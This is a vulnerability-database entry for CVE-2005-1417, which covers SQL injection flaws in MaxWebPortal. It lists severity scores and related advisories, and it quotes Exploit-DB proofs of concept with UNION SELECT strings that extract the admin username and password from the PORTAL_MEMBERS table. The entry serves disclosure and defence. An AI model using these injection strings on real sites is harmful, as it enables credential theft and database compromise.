CVE-2005-1417
Published 2005-05-03
Priority P342 · high · CVSS 2.0: 7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.46% (82.5th percentile)
Multiple SQL injection vulnerabilities in MaxWebPortal 2.x, 1.35, and other versions allow remote attackers to execute arbitrary SQL commands via (1) article_popular.asp, (2) arguments to dl_popular.asp, (3) arguments to links_popular.asp, (4) arguments to pic_popular.asp, (5) article_rate.asp, (6) dl_rate.asp, (7) links_rate.asp, (8) pic_rates.asp, (9) article_toprated.asp, (10) dl_toprated.asp, (11) links_toprated.asp, (12) arguments to pic_toprated.asp, or (13) the TOPIC_ID or Forum_ID parameters to custom_link.asp.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
| maxwebportal | maxwebportal | — | — |
GHSA
GHSA-x96g-vp28-xf6f: Multiple SQL injection vulnerabilities in forum
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-3436 [HIGH] CWE-89
Multiple SQL injection vulnerabilities in forum.asp in MaxWebPortal allow remote attackers to execute arbitrary SQL commands via the (1) FORUM_ID or (2) CAT_ID parameter. NOTE: this might overlap CVE-2005-1417.
GHSA
GHSA-8g92-h84q-8v35: Multiple SQL injection vulnerabilities in MaxWebPortal 2
ghsa_unreviewed·2022-05-01
CVE-2005-1417 [HIGH]
No detection rules found.
Exploit-DB
Maxwebportal 1.3 - 'dl_toprated.asp' SQL Injection
exploitdb·2005-05-02
CVE-2005-1417
---
source: https://www.securityfocus.com/bid/13466/info
MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1
FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
Exploit-DB
Maxwebportal 1.3 - 'custom_link.asp' Multiple SQL Injections
exploitdb·2005-05-02
CVE-2005-1417
---
source: https://www.securityfocus.com/bid/13466/info
custom_link.asp?method=Topic&TOPIC_ID=[Sql inject]
custom_link.asp?method=Forum&Forum_ID=[Sql inject]
Exploit-DB
Maxwebportal 1.3 - 'links_popular.asp' SQL Injection
exploitdb·2005-05-02
CVE-2005-1417
---
source: https://www.securityfocus.com/bid/13466/info
Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS
where
m_username='admin' union select
Exploit-DB
Maxwebportal 1.3 - 'dl_popular.asp' SQL Injection
exploitdb·2005-05-02
CVE-2005-1417
---
source: https://www.securityfocus.com/bid/13466/info
Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL
union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
Exploit-DB
Maxwebportal 1.3 - 'pic_popular.asp' SQL Injection
exploitdb·2005-05-02
CVE-2005-1417
---
source: https://www.securityfocus.com/bid/13466/info
pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL,
POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select
No writeups or analysis indexed.
http://secunia.com/advisories/15214
http://securitytracker.com/id?1013845
http://www.maxwebportal.info/downloads/mwp_security_fixes.zip
http://www.maxwebportal.info/topic.asp?TOPIC_ID=2482&FORUM_ID=1&CAT_ID=1&Forum_Title=General+Chat&Topic_Title=Security+Update
http://www.securityfocus.com/bid/13466